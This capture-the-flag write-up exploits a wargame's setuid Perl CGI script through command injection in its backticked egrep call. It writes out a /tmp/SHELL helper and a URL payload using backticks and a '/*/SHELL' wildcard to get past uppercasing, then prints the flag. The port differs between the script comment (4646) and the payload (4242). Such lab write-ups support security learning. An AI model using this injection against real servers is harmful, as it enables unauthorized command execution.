Again `Perl` script (((

Command: `ls -l`  
Output: 
```
total 4
-rwsr-sr-x+ 1 flag12 level12 464 Mar  5  2016 level12.pl
```

Command: `cat level12.pl`  
Output:
```
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; 
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}

n(t(param("x"), param("y")));
```
As we can see, this handler listening on port `4646` and it expects two arguments - `x` and `y`.
Inside `t` function `x` argument firstly changed to UPPERCASE and after that everything after space skipped.
The problem part of this script which we should exploit is `egrep`.

Create `SHELL` file in `/tmp` directory and grand `755` permission.
```
#!/bin/sh
getflag > /tmp/flag
```

On host machine in browser enter `<IP>:4242/level12.pl?x="`/*/SHELL`"`

Command: `cat /tmp/flag`  
Output: `Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr`

Flag: `g1qKMiRpXf53AWhDaU7FEkczr`